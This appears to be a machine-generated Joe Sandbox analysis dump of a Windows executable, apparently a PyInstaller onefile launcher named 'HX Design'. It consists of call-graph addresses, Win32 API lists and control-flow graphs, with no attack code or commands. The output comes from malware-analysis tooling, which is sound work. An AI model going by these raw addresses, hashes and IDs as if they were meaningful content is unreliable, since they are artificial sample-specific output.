17191 7ff7320736af 17183->17191 17187 7ff73207367f 17184->17187 17188 7ff7320735e8 17184->17188 17185->17198 17189 7ff73207365c 17186->17189 17190 7ff73207368f 17186->17190 17192 7ff732071b50 38 API calls 17187->17192 17196 7ff7320735ed 17188->17196 17199 7ff7320736be 17188->17199 17193 7ff7320735fd 17189->17193 17201 7ff73207366b 17189->17201 17194 7ff732071740 38 API calls 17190->17194 17191->17187 17191->17199 17208 7ff732073618 17191->17208 17192->17208 17195 7ff732073f04 47 API calls 17193->17195 17209 7ff7320736ed 17193->17209 17194->17208 17195->17208 17196->17193 17197 7ff732073630 17196->17197 17196->17208 17202 7ff7320743c0 47 API calls 17197->17202 17197->17209 17198->17150 17200 7ff732071f60 38 API calls 17199->17200 17199->17209 17200->17208 17201->17187 17203 7ff732073670 17201->17203 17202->17208 17205 7ff732074558 37 API calls 17203->17205 17203->17209 17204 7ff73206c550 _log10_special 8 API calls 17206 7ff732073983 17204->17206 17205->17208 17206->17150 17207 7ff73207e858 47 API calls 17207->17208 17208->17207 17208->17209 17209->17204 17261 7ff732070d14 17210->17261 17214 7ff732073f26 17213->17214 17215 7ff732070b80 12 API calls 17214->17215 17216 7ff732073f6e 17215->17216 17217 7ff73207e570 46 API calls 17216->17217 17218 7ff732074041 17217->17218 17219 7ff7320747c0 45 API calls 17218->17219 17220 7ff732074063 17218->17220 17219->17220 17221 7ff7320747c0 45 API calls 17220->17221 17222 7ff7320740ec 17220->17222 17221->17222 17222->17178 17224 7ff7320743d8 17223->17224 17226 7ff732074440 17223->17226 17225 7ff73207e858 47 API calls 17224->17225 17224->17226 17225->17226 17226->17178 17228 7ff732071b83 17227->17228 17229 7ff732071bb2 17228->17229 17231 7ff732071c6f 17228->17231 17230 7ff732070b80 12 API calls 17229->17230 17233 7ff732071bef 17229->17233 17230->17233 17232 7ff73207a814 _invalid_parameter_noinfo 37 API calls 17231->17232 17232->17233 17233->17178 17235 7ff732071773 17234->17235 17236 7ff7320717a2 17235->17236 17238 7ff73207185f 17235->17238 17237 7ff732070b80 12 API calls 17236->17237 17240 7ff7320717df 17236->17240 17237->17240 17239 7ff73207a814 _invalid_parameter_noinfo 37 API calls 17238->17239 17239->17240 17240->17178 17242 7ff732071f93 17241->17242 17243 7ff732071fc2 17242->17243 17245 7ff73207207f 17242->17245 17244 7ff732070b80 12 API calls 17243->17244 17247 7ff732071fff 17243->17247 17244->17247 17246 7ff73207a814 _invalid_parameter_noinfo 37 API calls 17245->17246 17246->17247 17247->17178 17249 7ff73207e880 17248->17249 17250 7ff73207e8c5 17249->17250 17252 7ff7320747c0 45 API calls 17249->17252 17254 7ff73207e885 __scrt_get_show_window_mode 17249->17254 17257 7ff73207e8ae __scrt_get_show_window_mode 17249->17257 17250->17254 17250->17257 17258 7ff7320807e8 17250->17258 17251 7ff73207a814 _invalid_parameter_noinfo 37 API calls 17251->17254 17252->17250 17254->17178 17257->17251 17257->17254 17260 7ff73208080c WideCharToMultiByte 17258->17260 17262 7ff732070d53 17261->17262 17263 7ff732070d41 17261->17263 17266 7ff732070d60 17262->17266 17269 7ff732070d9d 17262->17269 17264 7ff732074f08 _get_daylight 11 API calls 17263->17264 17265 7ff732070d46 17264->17265 17267 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17265->17267 17268 7ff73207a814 _invalid_parameter_noinfo 37 API calls 17266->17268 17270 7ff732070d51 17267->17270 17268->17270 17271 7ff732070e46 17269->17271 17273 7ff732074f08 _get_daylight 11 API calls 17269->17273 17270->17150 17271->17270 17272 7ff732074f08 _get_daylight 11 API calls 17271->17272 17274 7ff732070ef0 17272->17274 17275 7ff732070e3b 17273->17275 17277 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17274->17277 17276 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17275->17276 17276->17271 17277->17270 17282 7ff73207ec3d 17278->17282 17279 7ff73207ec42 17280 7ff7320751dd 17279->17280 17281 7ff732074f08 _get_daylight 11 API calls 17279->17281 17280->17128 17280->17129 17283 7ff73207ec4c 17281->17283 17282->17279 17282->17280 17285 7ff73207ec8c 17282->17285 17284 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17283->17284 17284->17280 17285->17280 17286 7ff732074f08 _get_daylight 11 API calls 17285->17286 17286->17283 17288 7ff732078258 17287->17288 17289 7ff732078245 17287->17289 17297 7ff732077ebc 17288->17297 17291 7ff732074f08 _get_daylight 11 API calls 17289->17291 17292 7ff73207824a 17291->17292 17293 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17292->17293 17295 7ff732078256 17293->17295 17295->16392 17304 7ff7320802d8 EnterCriticalSection 17297->17304 17306 7ff732068633 __std_exception_destroy 17305->17306 17307 7ff7320685b1 GetTokenInformation 17305->17307 17310 7ff73206864c 17306->17310 17311 7ff732068646 CloseHandle 17306->17311 17308 7ff7320685dd 17307->17308 17309 7ff7320685d2 GetLastError 17307->17309 17308->17306 17312 7ff7320685f9 GetTokenInformation 17308->17312 17309->17306 17309->17308 17310->16397 17311->17310 17312->17306 17314 7ff73206861c 17312->17314 17313 7ff732068626 ConvertSidToStringSidW 17313->17306 17314->17306 17314->17313 17316 7ff73206c850 17315->17316 17317 7ff732062b74 GetCurrentProcessId 17316->17317 17318 7ff7320626b0 48 API calls 17317->17318 17319 7ff732062bc7 17318->17319 17320 7ff732074bd8 48 API calls 17319->17320 17321 7ff732062c10 MessageBoxW 17320->17321 17322 7ff73206c550 _log10_special 8 API calls 17321->17322 17323 7ff732062c40 17322->17323 17323->16407 17325 7ff7320625e5 17324->17325 17326 7ff732074bd8 48 API calls 17325->17326 17327 7ff732062604 17326->17327 17327->16416 17363 7ff732078794 17328->17363 17332 7ff7320681dc 17331->17332 17333 7ff732069390 2 API calls 17332->17333 17334 7ff7320681fb 17333->17334 17335 7ff732068216 ExpandEnvironmentStringsW 17334->17335 17336 7ff732068203 17334->17336 17338 7ff73206823c __std_exception_destroy 17335->17338 17337 7ff732062810 49 API calls 17336->17337 17339 7ff73206820f __std_exception_destroy 17337->17339 17340 7ff732068253 17338->17340 17341 7ff732068240 17338->17341 17404 7ff732081558 17363->17404 17463 7ff7320812d0 17404->17463 17603 7ff73206456a 17602->17603 17604 7ff732069390 2 API calls 17603->17604 17605 7ff73206458f 17604->17605 17606 7ff73206c550 _log10_special 8 API calls 17605->17606 17607 7ff7320645b7 17606->17607 17607->16453 17609 7ff732067e2e 17608->17609 17610 7ff732067f52 17609->17610 17611 7ff732061c80 49 API calls 17609->17611 17612 7ff73206c550 _log10_special 8 API calls 17610->17612 17616 7ff732067eb5 17611->17616 17613 7ff732067f83 17612->17613 17613->16453 17614 7ff732061c80 49 API calls 17614->17616 17615 7ff732064560 10 API calls 17615->17616 17616->17610 17616->17614 17616->17615 17617 7ff732069390 2 API calls 17616->17617 17618 7ff732067f23 CreateDirectoryW 17617->17618 17618->17610 17618->17616 17620 7ff732061637 17619->17620 17621 7ff732061613 17619->17621 17623 7ff7320645c0 108 API calls 17620->17623 17740 7ff732061050 17621->17740 17625 7ff73206164b 17623->17625 17624 7ff732061618 17626 7ff73206162e 17624->17626 17630 7ff732062710 54 API calls 17624->17630 17627 7ff732061653 17625->17627 17628 7ff732061682 17625->17628 17626->16453 17631 7ff732074f08 _get_daylight 11 API calls 17627->17631 17629 7ff7320645c0 108 API calls 17628->17629 17632 7ff732061696 17629->17632 17630->17626 17633 7ff732061658 17631->17633 17634 7ff73206169e 17632->17634 17635 7ff7320616b8 17632->17635 17636 7ff732062910 54 API calls 17633->17636 17638 7ff732062710 54 API calls 17634->17638 17639 7ff7320706d4 73 API calls 17635->17639 17637 7ff732061671 17636->17637 17637->16453 17640 7ff7320616ae 17638->17640 17641 7ff7320616cd 17639->17641 17646 7ff73207004c 74 API calls 17640->17646 17642 7ff7320616f9 17641->17642 17668 7ff73206718b 17667->17668 17670 7ff732067144 17667->17670 17668->16453 17670->17668 17804 7ff732075024 17670->17804 17672 7ff7320641a1 17671->17672 17673 7ff7320644e0 49 API calls 17672->17673 17674 7ff7320641db 17673->17674 17675 7ff7320644e0 49 API calls 17674->17675 17676 7ff7320641eb 17675->17676 17677 7ff73206423c 17676->17677 17678 7ff73206420d 17676->17678 17680 7ff732064110 51 API calls 17677->17680 17835 7ff732064110 17678->17835 17681 7ff73206423a 17680->17681 17682 7ff73206429c 17681->17682 17683 7ff732064267 17681->17683 17716 7ff732061c80 49 API calls 17715->17716 17717 7ff732064474 17716->17717 17717->16453 17741 7ff7320645c0 108 API calls 17740->17741 17742 7ff73206108c 17741->17742 17743 7ff7320610a9 17742->17743 17744 7ff732061094 17742->17744 17746 7ff7320706d4 73 API calls 17743->17746 17745 7ff732062710 54 API calls 17744->17745 17752 7ff7320610a4 __std_exception_destroy 17745->17752 17747 7ff7320610bf 17746->17747 17748 7ff7320610c3 17747->17748 17749 7ff7320610e6 17747->17749 17750 7ff732074f08 _get_daylight 11 API calls 17748->17750 17753 7ff7320610f7 17749->17753 17754 7ff732061122 17749->17754 17752->17624 17805 7ff73207505e 17804->17805 17806 7ff732075031 17804->17806 17807 7ff732075081 17805->17807 17810 7ff73207509d 17805->17810 17808 7ff732074f08 _get_daylight 11 API calls 17806->17808 17815 7ff732074fe8 17806->17815 17809 7ff732074f08 _get_daylight 11 API calls 17807->17809 17811 7ff73207503b 17808->17811 17812 7ff732075086 17809->17812 17819 7ff732074f4c 17810->17819 17814 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17811->17814 17816 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17812->17816 17818 7ff732075046 17814->17818 17815->17670 17817 7ff732075091 17816->17817 17817->17670 17818->17670 17820 7ff732074f6b 17819->17820 17821 7ff732074f70 17819->17821 17820->17817 17821->17820 17822 7ff73207b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17821->17822 17823 7ff732074f8b 17822->17823 17827 7ff73207d984 17823->17827 17828 7ff732074fae 17827->17828 17829 7ff73207d999 17827->17829 17829->17828 17836 7ff732064136 17835->17836 17837 7ff732074984 49 API calls 17836->17837 17899 7ff732075ec8 17898->17899 17900 7ff732075eee 17899->17900 17902 7ff732075f21 17899->17902 17901 7ff732074f08 _get_daylight 11 API calls 17900->17901 17903 7ff732075ef3 17901->17903 17904 7ff732075f27 17902->17904 17905 7ff732075f34 17902->17905 17906 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 17903->17906 17908 7ff732074f08 _get_daylight 11 API calls 17904->17908 17917 7ff73207ac28 17905->17917 17907 7ff732064616 17906->17907 17907->16485 17908->17907 17930 7ff7320802d8 EnterCriticalSection 17917->17930 18290 7ff7320778f8 18289->18290 18293 7ff7320773d4 18290->18293 18292 7ff732077911 18292->16495 18294 7ff73207741e 18293->18294 18295 7ff7320773ef 18293->18295 18303 7ff73207546c EnterCriticalSection 18294->18303 18296 7ff73207a814 _invalid_parameter_noinfo 37 API calls 18295->18296 18298 7ff73207740f 18296->18298 18298->18292 18305 7ff73206fe43 18304->18305 18306 7ff73206fe71 18304->18306 18307 7ff73207a814 _invalid_parameter_noinfo 37 API calls 18305->18307 18308 7ff73206fe63 18306->18308 18314 7ff73207546c EnterCriticalSection 18306->18314 18307->18308 18308->16499 18316 7ff7320645c0 108 API calls 18315->18316 18317 7ff732061493 18316->18317 18318 7ff7320614bc 18317->18318 18319 7ff73206149b 18317->18319 18320 7ff7320706d4 73 API calls 18318->18320 18321 7ff732062710 54 API calls 18319->18321 18322 7ff7320614d1 18320->18322 18323 7ff7320614ab 18321->18323 18422 7ff732066375 18421->18422 18423 7ff732061c80 49 API calls 18422->18423 18424 7ff7320663b1 18423->18424 18425 7ff7320663dd 18424->18425 18426 7ff7320663ba 18424->18426 18428 7ff732064630 49 API calls 18425->18428 18427 7ff732062710 54 API calls 18426->18427 18451 7ff7320663d3 18427->18451 18429 7ff7320663f5 18428->18429 18430 7ff732066413 18429->18430 18432 7ff732062710 54 API calls 18429->18432 18433 7ff732064560 10 API calls 18430->18433 18431 7ff73206c550 _log10_special 8 API calls 18435 7ff73206336e 18431->18435 18432->18430 18434 7ff73206641d 18433->18434 18436 7ff73206642b 18434->18436 18437 7ff732068e80 3 API calls 18434->18437 18435->16594 18452 7ff732066500 18435->18452 18437->18436 18451->18431 18711 7ff73207b150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18710->18711 18712 7ff73207a3e1 18711->18712 18715 7ff73207a504 18712->18715 18724 7ff732083650 18715->18724 18750 7ff732083608 18724->18750 18755 7ff7320802d8 EnterCriticalSection 18750->18755 19762 7ff73208ad69 19765 7ff732075478 LeaveCriticalSection 19762->19765 19901 7ff73208abe3 19903 7ff73208abf3 19901->19903 19905 7ff732075478 LeaveCriticalSection 19903->19905 19510 7ff732079961 19511 7ff73207a3d8 45 API calls 19510->19511 19512 7ff732079966 19511->19512 19513 7ff73207998d GetModuleHandleW 19512->19513 19514 7ff7320799d7 19512->19514 19513->19514 19518 7ff73207999a 19513->19518 19522 7ff732079864 19514->19522 19518->19514 19536 7ff732079a88 GetModuleHandleExW 19518->19536 19542 7ff7320802d8 EnterCriticalSection 19522->19542 19537 7ff732079abc GetProcAddress 19536->19537 19538 7ff732079ae5 19536->19538 19539 7ff732079ace 19537->19539 19540 7ff732079aea FreeLibrary 19538->19540 19541 7ff732079af1 19538->19541 19539->19538 19540->19541 19541->19514 19553 7ff73206bae0 19554 7ff73206bb0e 19553->19554 19555 7ff73206baf5 19553->19555 19555->19554 19557 7ff73207d5fc 12 API calls 19555->19557 19556 7ff73206bb6e 19557->19556 15899 7ff73207f98c 15900 7ff73207fb7e 15899->15900 15902 7ff73207f9ce _isindst 15899->15902 15951 7ff732074f08 15900->15951 15902->15900 15905 7ff73207fa4e _isindst 15902->15905 15920 7ff732086194 15905->15920 15910 7ff73207fbaa 15963 7ff73207a900 IsProcessorFeaturePresent 15910->15963 15917 7ff73207faab 15919 7ff73207fb6e 15917->15919 15944 7ff7320861d8 15917->15944 15954 7ff73206c550 15919->15954 15921 7ff7320861a3 15920->15921 15922 7ff73207fa6c 15920->15922 15967 7ff7320802d8 EnterCriticalSection 15921->15967 15926 7ff732085598 15922->15926 15927 7ff73207fa81 15926->15927 15928 7ff7320855a1 15926->15928 15927->15910 15932 7ff7320855c8 15927->15932 15929 7ff732074f08 _get_daylight 11 API calls 15928->15929 15930 7ff7320855a6 15929->15930 15968 7ff73207a8e0 15930->15968 15933 7ff73207fa92 15932->15933 15934 7ff7320855d1 15932->15934 15933->15910 15938 7ff7320855f8 15933->15938 15935 7ff732074f08 _get_daylight 11 API calls 15934->15935 15936 7ff7320855d6 15935->15936 15937 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 15936->15937 15937->15933 15939 7ff73207faa3 15938->15939 15940 7ff732085601 15938->15940 15939->15910 15939->15917 15941 7ff732074f08 _get_daylight 11 API calls 15940->15941 15942 7ff732085606 15941->15942 15943 7ff73207a8e0 _invalid_parameter_noinfo 37 API calls 15942->15943 15943->15939 16052 7ff7320802d8 EnterCriticalSection 15944->16052 16053 7ff73207b2c8 GetLastError 15951->16053 15953 7ff732074f11 15953->15919 15955 7ff73206c559 15954->15955 15956 7ff73206c564 15955->15956 15957 7ff73206c8e0 IsProcessorFeaturePresent 15955->15957 15958 7ff73206c8f8 15957->15958 16070 7ff73206cad8 RtlCaptureContext 15958->16070 15964 7ff73207a913 15963->15964 16075 7ff73207a614 15964->16075 15971 7ff73207a778 15968->15971 15970 7ff73207a8f9 15970->15927 15972 7ff73207a7a3 15971->15972 15975 7ff73207a814 15972->15975 15974 7ff73207a7ca 15974->15970 15985 7ff73207a55c 15975->15985 15978 7ff73207a84f 15978->15974 15981 7ff73207a900 _isindst 17 API calls 15982 7ff73207a8df 15981->15982 15983 7ff73207a778 _invalid_parameter_noinfo 37 API calls 15982->15983 15984 7ff73207a8f9 15983->15984 15984->15974 15986 7ff73207a578 GetLastError 15985->15986 15987 7ff73207a5b3 15985->15987 15988 7ff73207a588 15986->15988 15987->15978 15991 7ff73207a5c8 15987->15991 15994 7ff73207b390 15988->15994 15992 7ff73207a5e4 GetLastError SetLastError 15991->15992 15993 7ff73207a5fc 15991->15993 15992->15993 15993->15978 15993->15981 15995 7ff73207b3ca FlsSetValue 15994->15995 15996 7ff73207b3af FlsGetValue 15994->15996 15998 7ff73207b3d7 15995->15998 15999 7ff73207a5a3 SetLastError 15995->15999 15997 7ff73207b3c4 15996->15997 15996->15999 15997->15995 16011 7ff73207eb98 15998->16011 15999->15987 16002 7ff73207b404 FlsSetValue 16005 7ff73207b422 16002->16005 16006 7ff73207b410 FlsSetValue 16002->16006 16003 7ff73207b3f4 FlsSetValue 16004 7ff73207b3fd 16003->16004 16018 7ff73207a948 16004->16018 16024 7ff73207aef4 16005->16024 16006->16004 16017 7ff73207eba9 _get_daylight 16011->16017 16012 7ff73207ebfa 16014 7ff732074f08 _get_daylight 10 API calls 16012->16014 16013 7ff73207ebde HeapAlloc 16015 7ff73207b3e6 16013->16015 16013->16017 16014->16015 16015->16002 16015->16003 16017->16012 16017->16013 16029 7ff732083590 16017->16029 16019 7ff73207a94d RtlFreeHeap 16018->16019 16020 7ff73207a97c 16018->16020 16019->16020 16021 7ff73207a968 GetLastError 16019->16021 16020->15999 16022 7ff73207a975 Concurrency::details::SchedulerProxy::DeleteThis 16021->16022 16023 7ff732074f08 _get_daylight 9 API calls 16022->16023 16023->16020 16038 7ff73207adcc 16024->16038 16032 7ff7320835d0 16029->16032 16037 7ff7320802d8 EnterCriticalSection 16032->16037 16050 7ff7320802d8 EnterCriticalSection 16038->16050 16054 7ff73207b309 FlsSetValue 16053->16054 16059 7ff73207b2ec 16053->16059 16055 7ff73207b31b 16054->16055 16056 7ff73207b2f9 16054->16056 16058 7ff73207eb98 _get_daylight 5 API calls 16055->16058 16057 7ff73207b375 SetLastError 16056->16057 16057->15953 16060 7ff73207b32a 16058->16060 16059->16054 16059->16056 16061 7ff73207b348 FlsSetValue 16060->16061 16062 7ff73207b338 FlsSetValue 16060->16062 16064 7ff73207b366 16061->16064 16065 7ff73207b354 FlsSetValue 16061->16065 16063 7ff73207b341 16062->16063 16066 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16063->16066 16067 7ff73207aef4 _get_daylight 5 API calls 16064->16067 16065->16063 16066->16056 16068 7ff73207b36e 16067->16068 16069 7ff73207a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16068->16069 16069->16057 16071 7ff73206caf2 RtlLookupFunctionEntry 16070->16071 16072 7ff73206cb08 RtlVirtualUnwind 16071->16072 16073 7ff73206c90b 16071->16073 16072->16071 16072->16073 16074 7ff73206c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16073->16074 16076 7ff73207a64e _isindst __scrt_get_show_window_mode 16075->16076 16077 7ff73207a676 RtlCaptureContext RtlLookupFunctionEntry 16076->16077 16078 7ff73207a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16077->16078 16079 7ff73207a6b0 RtlVirtualUnwind 16077->16079 16080 7ff73207a738 _isindst 16078->16080 16079->16078 16081 7ff73206c550 _log10_special 8 API calls 16080->16081 16082 7ff73207a757 GetCurrentProcess TerminateProcess 16081->16082 19983 7ff732075410 19984 7ff73207541b 19983->19984 19992 7ff73207f2a4 19984->19992 20005 7ff7320802d8 EnterCriticalSection 19992->20005 20006 7ff73208adfe 20007 7ff73208ae17 20006->20007 20008 7ff73208ae0d 20006->20008 20010 7ff732080338 LeaveCriticalSection 20008->20010

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 0 7ff7320689e0-7ff732068b26 call 7ff73206c850 call 7ff732069390 SetConsoleCtrlHandler GetStartupInfoW call 7ff7320753f0 call 7ff73207a47c call 7ff73207871c call 7ff7320753f0 call 7ff73207a47c call 7ff73207871c call 7ff7320753f0 call 7ff73207a47c call 7ff73207871c GetCommandLineW CreateProcessW 23 7ff732068b4d-7ff732068b89 RegisterClassW 0->23 24 7ff732068b28-7ff732068b48 GetLastError call 7ff732062c50 0->24 26 7ff732068b8b GetLastError 23->26 27 7ff732068b91-7ff732068be5 CreateWindowExW 23->27 32 7ff732068e39-7ff732068e5f call 7ff73206c550 24->32 26->27 29 7ff732068be7-7ff732068bed GetLastError 27->29 30 7ff732068bef-7ff732068bf4 ShowWindow 27->30 31 7ff732068bfa-7ff732068c0a WaitForSingleObject 29->31 30->31 33 7ff732068c0c 31->33 34 7ff732068c88-7ff732068c8f 31->34 36 7ff732068c10-7ff732068c13 33->36 37 7ff732068c91-7ff732068ca1 WaitForSingleObject 34->37 38 7ff732068cd2-7ff732068cd9 34->38 40 7ff732068c1b-7ff732068c22 36->40 41 7ff732068c15 GetLastError 36->41 42 7ff732068ca7-7ff732068cb7 TerminateProcess 37->42 43 7ff732068df8-7ff732068e02 37->43 44 7ff732068cdf-7ff732068cf5 QueryPerformanceFrequency QueryPerformanceCounter 38->44 45 7ff732068dc0-7ff732068dd9 GetMessageW 38->45 40->37 46 7ff732068c24-7ff732068c41 PeekMessageW 40->46 41->40 51 7ff732068cb9 GetLastError 42->51 52 7ff732068cbf-7ff732068ccd WaitForSingleObject 42->52 49 7ff732068e04-7ff732068e0a DestroyWindow 43->49 50 7ff732068e11-7ff732068e35 GetExitCodeProcess CloseHandle * 2 43->50 53 7ff732068d00-7ff732068d38 MsgWaitForMultipleObjects PeekMessageW 44->53 47 7ff732068ddb-7ff732068de9 TranslateMessage DispatchMessageW 45->47 48 7ff732068def-7ff732068df6 45->48 56 7ff732068c76-7ff732068c86 WaitForSingleObject 46->56 57 7ff732068c43-7ff732068c74 TranslateMessage DispatchMessageW PeekMessageW 46->57 47->48 48->43 48->45 49->50 50->32 51->52 52->43 54 7ff732068d3a 53->54 55 7ff732068d73-7ff732068d7a 53->55 58 7ff732068d40-7ff732068d71 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->45 59 7ff732068d7c-7ff732068da5 QueryPerformanceCounter 55->59 56->34 56->36 57->56 57->57 58->55 58->58 59->53 60 7ff732068dab-7ff732068db2 59->60 60->43 61 7ff732068db4-7ff732068db8 60->61 61->45
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2117541431.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117491332.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117598680.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117650170.00007FF7320A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2117751470.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                      • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                      • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                      • Instruction ID: 0f3fcc71c99d91d152d4c9e453354d3c2ea977a92c1cc27beb717180c93d1ef3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2D18431B08B82A6EB10AF74E8942BAB760FF84B58F800235DA5D47AA5DF7CD14DD714

                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                      control_flow_graph 62 7ff732061000-7ff732063806 call 7ff73206fe18 call 7ff73206fe20 call 7ff73206c850 call 7ff7320753f0 call 7ff732075484 call 7ff7320636b0 76 7ff732063808-7ff73206380f 62->76 77 7ff732063814-7ff732063836 call 7ff732061950 62->77 78 7ff732063c97-7ff732063cb2 call 7ff73206c550 76->78 82 7ff73206383c-7ff732063856 call 7ff732061c80 77->82 83 7ff73206391b-7ff732063931 call 7ff7320645c0 77->83 87 7ff73206385b-7ff73206389b call 7ff732068830 82->87 90 7ff73206396a-7ff73206397f call 7ff732062710 83->90 91 7ff732063933-7ff732063960 call 7ff732067f90 83->91 97 7ff73206389d-7ff7320638a3 87->97 98 7ff7320638c1-7ff7320638cc call 7ff732074f30 87->98 101 7ff732063c8f 90->101 99 7ff732063984-7ff7320639a6 call 7ff732061c80 91->99 100 7ff732063962-7ff732063965 call 7ff73207004c 91->100 102 7ff7320638a5-7ff7320638ad 97->102 103 7ff7320638af-7ff7320638bd call 7ff7320689a0 97->103 109 7ff7320639fc-7ff732063a2a call 7ff732068940 call 7ff7320689a0 * 3 98->109 110 7ff7320638d2-7ff7320638e1 call 7ff732068830 98->110 115 7ff7320639b0-7ff7320639b9 99->115 100->90 101->78 102->103 103->98 138 7ff732063a2f-7ff732063a3e call 7ff732068830 109->138 119 7ff7320638e7-7ff7320638ed 110->119 120 7ff7320639f4-7ff7320639f7 call 7ff732074f30 110->120 115->115 118 7ff7320639bb-7ff7320639d8 call 7ff732061950 115->118 118->87 130 7ff7320639de-7ff7320639ef call 7ff732062710 118->130 124 7ff7320638f0-7ff7320638fc 119->124 120->109 127 7ff7320638fe-7ff732063903 124->127 128 7ff732063905-7ff732063908 124->128 127->124 127->128 128->120 131 7ff73206390e-7ff732063916 call 7ff732074f30 128->131 130->101 131->138 141 7ff732063a44-7ff732063a47 138->141 142 7ff732063b45-7ff732063b53 138->142 141->142 145 7ff732063a4d-7ff732063a50 141->145 143 7ff732063a67 142->143 144 7ff732063b59-7ff732063b5d 142->144 146 7ff732063a6b-7ff732063a90 call 7ff732074f30 143->146 144->146 147 7ff732063b14-7ff732063b17 145->147 148 7ff732063a56-7ff732063a5a 145->148 157 7ff732063aab-7ff732063ac0 146->157 158 7ff732063a92-7ff732063aa6 call 7ff732068940 146->158 150 7ff732063b19-7ff732063b1d 147->150 151 7ff732063b2f-7ff732063b40 call 7ff732062710 147->151 148->147 149 7ff732063a60 148->149 149->143 150->151 153 7ff732063b1f-7ff732063b2a 150->153 159 7ff732063c7f-7ff732063c87 151->159 153->146 161 7ff732063be8-7ff732063bfa call 7ff732068830 157->161 162 7ff732063ac6-7ff732063aca 157->162 158->157 159->101 170 7ff732063bfc-7ff732063c02 161->170 171 7ff732063c2e 161->171 164 7ff732063bcd-7ff732063be2 call 7ff732061940 162->164 165 7ff732063ad0-7ff732063ae8 call 7ff732075250 162->165 164->161 164->162 175 7ff732063aea-7ff732063b02 call 7ff732075250 165->175 176 7ff732063b62-7ff732063b7a call 7ff732075250 165->176 173 7ff732063c1e-7ff732063c2c 170->173 174 7ff732063c04-7ff732063c1c 170->174 177 7ff732063c31-7ff732063c40 call 7ff732074f30 171->177 173->177 174->177 175->164 188 7ff732063b08-7ff732063b0f 175->188 186 7ff732063b7c-7ff732063b80 176->186 187 7ff732063b87-7ff732063b9f call 7ff732075250 176->187 184 7ff732063c46-7ff732063c4a 177->184 185 7ff732063d41-7ff732063d63 call 7ff7320644e0 177->185 189 7ff732063cd4-7ff732063ce6 call 7ff732068830 184->189 190 7ff732063c50-7ff732063c5f call 7ff7320690e0 184->190 199 7ff732063d65-7ff732063d6f call 7ff732064630 185->199 200 7ff732063d71-7ff732063d82 call 7ff732061c80 185->200 186->187 201 7ff732063bac-7ff732063bc4 call 7ff732075250 187->201 202 7ff732063ba1-7ff732063ba5 187->202 188->164 206 7ff732063ce8-7ff732063ceb 189->206 207 7ff732063d35-7ff732063d3c 189->207 204 7ff732063cb3-7ff732063cb6 call 7ff732068660 190->204 205 7ff732063c61 190->205 214 7ff732063d87-7ff732063d96 199->214 200->214 201->164 217 7ff732063bc6 201->217 202->201 216 7ff732063cbb-7ff732063cbd 204->216 211 7ff732063c68 call 7ff732062710 205->211 206->207 212 7ff732063ced-7ff732063d10 call 7ff732061c80 206->212 207->211 225 7ff732063c6d-7ff732063c77 211->225 229 7ff732063d2b-7ff732063d33 call 7ff732074f30 212->229 230 7ff732063d12-7ff732063d26 call 7ff732062710 call 7ff732074f30 212->230 220 7ff732063d98-7ff732063d9f 214->220 221 7ff732063dc4-7ff732063dda call 7ff732069390 214->221 223 7ff732063cc8-7ff732063ccf 216->223 224 7ff732063cbf-7ff732063cc6 216->224 217->164 220->221 227 7ff732063da1-7ff732063da5 220->227 233 7ff732063ddc 221->233 234 7ff732063de8-7ff732063e04 SetDllDirectoryW 221->234 223->214 224->211 225->159 227->221 231 7ff732063da7-7ff732063dbe SetDllDirectoryW LoadLibraryExW 227->231 229->214 230->225 231->221 233->234 